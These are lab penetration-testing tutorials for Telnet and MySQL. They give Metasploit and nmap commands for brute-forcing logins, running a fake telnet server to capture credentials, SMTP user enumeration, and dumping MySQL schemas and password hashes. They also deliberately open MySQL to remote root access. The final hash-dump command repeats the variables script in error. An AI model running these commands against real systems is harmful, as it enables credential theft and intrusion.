Penetration Testing on Telnet (Port 23)

Telnet is a TCP/IP network terminal emulation program that allows you to reach another Internet or local area network device by logging in to the remote machine. Telnet is a client-server protocol used for link to port number 23 of Transmission Control Protocol. Using Telnet, you can even test open ports on a remote network.

Requirements

Telnet Server: Ubuntu

Attacker system: Kali Linux

Table of Content

·         Installation & Configuration

·         Connecting to Telnet

·         Banner Grabbing of Telnet

·         Banner Grabbing through Telnet

·         MITM: Telnet Spoofing

·         Brute Forcing

·         Telnet credential Sniffing

Installation & Configuration

Telnet is an unencrypted and therefore insecure protocol and we recommend to use SSH over the telnet as it is an encrypted protocol. But still you should have the understanding of all the protocols and telnet is one of the protocol through which you can connect to the other system in your local network. So let’s start the installation first. Telnet Server installation is quite simple.

Run the following command with root access in your Ubuntu to install Telnet.

apt-get install telnetd

Upon completion of the installation, you can test the Telnet service status by using the following command.

systemctl status inetd

And with the output shown in the screenshot we can observe that the service is active in Ubuntu.

Test Telnet Connection from Windows machine

Now we will connect telnet with putty. Enter the ip address of Ubuntu and give port 23 in order to connect with telnet and hit open.

As we hit open a new pop up gets open which asks for the Ubuntu username and password and after submitting the right values we are logged in to Ubuntu.

Connecting to Telnet

The telnet is installed. It's time to connect a remote Telnet server. Log in to your kali machine and run the following command. To get connected it will ask for the username and password, after providing the right values; you got connected.

telnet 192.168.0.196

Banner Grabbing of Telnet

Now once the setup of telnet is ready, we will run the version scan to know which version is running in the Ubuntu and as shown in the screenshot below we got the version with this scan.

Banner Grabbing through Telnet

In the banner capture of other systems operating on the target network, Telnet plays a significant role.

To find the version of SSH service running on the target computer, open the terminal in Kali Linux with the following instruction.

telnet 192.168.0.196 22

Similarly, the version and legitimate user of SMTP server can also be associated with telnet. Run the command below and find out their version and current user.

telnet 192.168.0.136 25

You will note from the picture that "220 metasploitable.localdomain ESMTP Postfix" was successfully mounted on the target computer.

If you receive the answer code 550 this means an unknown user account: You can guess for a legitimate user account via following command:

vrfy msfadmin

If the message code 250,251,252 was received to the degree that the server acknowledged the application and user account is correct.

If you have received a message code 550, it means that the account is invalid as shown in the picture.

MITM: Telnet Spoofing

An attack may use telnet spoofing as Man-in-the-middle attack in order to capture the telnet login credential.

This can achieve by generating a bogus telnet service in the network. Open the terminal in your Kali Linux and Load Metasploit framework; now type the following command to start the server and here we have also given a banner of “Welcome to Hacking Articles” which you can set any of your choice.

use auxiliary/server/capture/telnet

set srvhost 192.168.0.102

set banner Welcome to Hacking Articles

exploit

Now as soon as the attacker found that telnet is running in the victim’s system he tries to get connected and in order to get connected he submits the credentials and the login gets failed.

But we can see our logs here in the server which represents who tried to connect with telnet.

Brute Forcing

An attacker is still attempting to use brute force for stealing credentials. This module checks a telnet login and records positive connections on a variety of devices.

use auxiliary/scanner/telnet/telnet_login

msf auxiliary(telnet_login) > set rhosts 192.168.0.196

msf auxiliary(telnet_login) > set user_file /root/Desktop/user.txt

msf auxiliary(telnet_login) > set pass_file /root/Desktop/pass.txt

msf auxiliary(telnet_login) > set stop_on_success true

msf auxiliary(telnet_login) > exploit

As you can observe that , here it has obtain the valid credential for the telnet moreover provide the session for the victim’s shell.

sessions  –u  2

Once we got the meterpreter of the victim we will execute sysinfo command to check that we are on Ubuntu machine.

Telnet credential Sniffing

By default Telnet does not encrypt all linked data, even passwords, and thus it is always possible to eavesdrop the communications and then use the password for malicious uses; someone who has network access between the two hosts used by Telnet can interrupt the packets between the source and target, and obtain authentication, password and data details.

From given below image you can read the username: raj and password: 123 for Telnet moreover complete information traveling through packet between source to destination. 

Since Telnet implementations do not support Transport Layer Security (TLS) security and Simple Authentication and Security Layer (SASL) authentication extensions. Therefore, in favour of that the Secure Shell (SSH) protocol, first released in 1995 in replace of Telnet.

Penetration Testing on MYSQL (Port 3306)

In this article we will learn to make MySQL port vulnerable and then secure it for the penetration testing on the port 3306. In order to completely learn and understand how to secure a service on a port, you have to understand how to make it vulnerable and then perform penetration testing. Because if you don’t understand what can be exploit and how then you will always fail to secure it.

Table of content

·         Introduction to MySQL-Server

·         Installation of MySQL-Server

·         Pen testing MySQL-Server

Introduction to MySQL-Server

The base of MySQL will be MySQL server, which handles the majority of the database guidelines (or directions). MySQL server is accessible as a different program for use in a customer server organized condition and as a library that can be implanted (or connected) into separate applications. MySQL works alongside a few utility projects which bolster the organization of MySQL databases. Directions are sent to MySQL-Server by means of the MySQL customer, which is introduced on a PC. It run port 3306 by default.

Installation of MySQL-server

First thing to do is to install mysql server and to do so use the following command :

apt install mysql-server

Further, use the following command to check whether the server is up and running or not.

netstat -tnl

Pentesting MySQL-Server

Scanning Mysql & Connecting tO Mysql

Now, as you can see the mysql server is properly working. But if you will scan the port, it will show you that its closed.

nmap -p3306 192.168.1.108

This port is closed because as it is running on local address, when scanned with any other IP then it will show you that the port is closed when this is not the case. This happens because of the default setting in the configuration’s files of mysql, the bind address is 127.0.0.1 i.e. the port will be shown open only if you scan from this IP just like show in the image below. And to make this change open the configuration file using the following command:

nano etc/mysql/mysql.conf.d/mysqld.cnf

To change this setting, just add ‘#’ in front of the ‘bind-address’ as shown in the image below :

Now if you scan it, it will show you that the port is open.

nmap -p3306 192.168.1.108

But further if you try to login through this port, it will give you an error. This happens because the mysql server does not grant privileges to other IP’s to do their bidding.

This error can be removed when you login into the mysql server and run the following commands which will grant all permission to the root user at when login from different IP :

GRANT ALL PRIVILEGES ON *.* TO root@’%’ IDENTIFIED BY ‘123’;

FLUSH PRIVILEGES;

Now, when you try and login, you will be successful as shown in the image below:

Let’s scan the port again to grab as many details as we can such as its banner. Mac address, etc.

nmap -sv -p3306 192.168.1.108

Mysql Brute-Force Attack

One can also brute force the port by using metaspslsoit. This module simply queries the MySQL instance for a specific user/pass for this, go to the terminal in kali and type ‘msfconsole’ and then use the following commands to commence the brute force login:

use auxiliary/scanner/mysql/mysql_login

set rhosts 192.168.1.108

set user_file /root/Desktop/user.txt

set pass_file /root/Desktop/pass.txt

exploit

Running SQL queries without Login into Mysql

This module allows for simple SQL statements to be executed against a MySQL instance given the appropriate credentials. For this, type :

use auxiliary/admin/mysql/mysql_sql

set rhosts 192.162.1.108

set username root

set password 123

set sql show databases

exploit

Extract Mysql-Schemadump Information

Our next module extracts the schema information from a MySQL DB server. For this exploit, type :

use auxiliary/scanner/mysql/mysql_schemadump

set rhosts 192.168.1.108

set username root

set password 123

exploit

Extracting Login from Mysql-server

And to extracts the usernames and encrypted password hashes from a MySQL server and stores them for later cracking; use the following exploit :

use auxiliary/scanner/mysql/mysql_hashdump

set rhosts 192.168.1.108

set username root

set password 123

exploit

Once the above module is completed, you see it result in the file it creates as shown in the image below:

Checking Writable Directories

Another attack that can be executed on Mysql port is to check the directories that are writable. But by default, this attack cannot be performed. So, admin the has done following the configuration then an attacker can check for directories that are writable.

nano etc/mysql/mysql.conf.d/mysqld.cnf

Then add ‘secure_file_priv=””’ at the end of the file.

Now if you run the following exploit through Metasploit, it will allow you to Enumerate writeable directories using the MySQL SELECT INTO DUMPFILE feature.

use auxiliary/scanner/mysql/mysql_writable_dirs

set rhosts 192.168.1.108

set username root

set password 123

set dir_list /root/dir.txt

exploit

Enumerating File

For further pentesting mysql port, you can use the following exploit for Enumerate files and directories using the MySQL load_file feature.

use auxiliary/scanner/mysql/mysql_file_enum

set rhosts 192.168.1.108

set username root

set password 123

set file_list /root/dir.txt

exploit

Port Transferring

Next comes port forwarding. This method is used in order to secure the port from the attacks. For port forwarding, just open the configuration by using the following command:

 nano etc/mysql/mysql.conf.d/mysqld.cnf

And then change the port number to which ever you desire. For instance, we have given here 4033

.

After changing the port, when you scan the it, it will show you the sql service is running on the new port instead of the default one.

So, this way to learn how to exploit and secure MySQL-Server.

MySQL Penetration Testing with NMAP

In this article we are discussing MYSQL penetration testing using Nmap where you will learn how to retrieve database information such as database name, table’s records, username, password and etc.

MySQL is an open Source for Relational Database Management System that uses structured query language for generating database record.  

Lets Begin !!!

Scanning for port 3306

open the terminal and type following command to check mysql service is activated on targeted system or not, basically mysql service is activated on default port 3306.

Nmap –sT 192.168.1.216

From given image you can observe port 3306 is open for mysql service, now lets enumerate it

Retrieve mysql information

Now type another command to retrieve mysql information such as version, protocol and etc:

Nmap –script=mysql-info 192.168.1.216

Above command try to connect to with MySQL server and hence prints information such as the protocol: 10, version numbers: 5.5.57 -0ubuntu0.14.04.1, thread ID: 159, status: autocommit, capabilities, and the password salt as shown in given below image.

Brute force attack

This command will use dictionary for username and password and then try to match the username and password combination by making brute force attack against mysql.

Nmap –p 3306 –script mysql-brute –script-args userdb=/root/Desktop.lst,passdb=/root/Desktop/pass.lst 192.168.1.216

From given image you can observe that it found the valid credential root: toor. This credential will help in directly login into MYSQL server.

Retrieve mysql user names

This command will fetch mysql users name which help of given argument mysqluser root and mysqlpass toor.

Nmap –p 3306 –script=mysql-users 192.168.1.216 –script-args mysqluser=root,mysqlpass=toor

From given below image you can see we had found four user names: root, debian-sys-maint, sr, st.

Retrieve database names

This command will fetch mysql database name which help of given argument mysqluser root and mysqlpass toor.

Nmap –p 3306 –script=mysql-databases 192.168.1.216 –script-args mysqluser=root,mysqlpass=toor

From given below image you can read the name of created database such as ignite

This command will also perform same task as above but retrieve database name using mysql query “show database”

Nmap –p 3306 192.168.1.216 –script mysql-query –script-args “query=show databases,username=root,password=toor”

From given below image you can read the name of created database such as ignite

Retrieve mysql variable status ON/OFF

When we want to pass a value from one SQL statement to another SQL statement, then we store the value in a MySQL user-defined variable.

This command will fetch mysql variables name which help of given argument mysqluser root and mysqlpass toor.

Nmap –p 3306 –script=mysql-variables 192.168.1.216 –script-args mysqluser=root,mysqlpass=toor

From given image you can observe ON/OFF status for mysql variable.

Retrieve Hash password

This command will Dumps the password hashes from a MySQL server in a format suitable for cracking by tools such as John the Ripper.

Nmap –p 3306 –script=mysql-variables 192.168.1.216 –script-args mysqluser=root,mysqlpass=toor

From given image you can observe that it has dumped the hash value of passwords of respective user which we have enumerated above.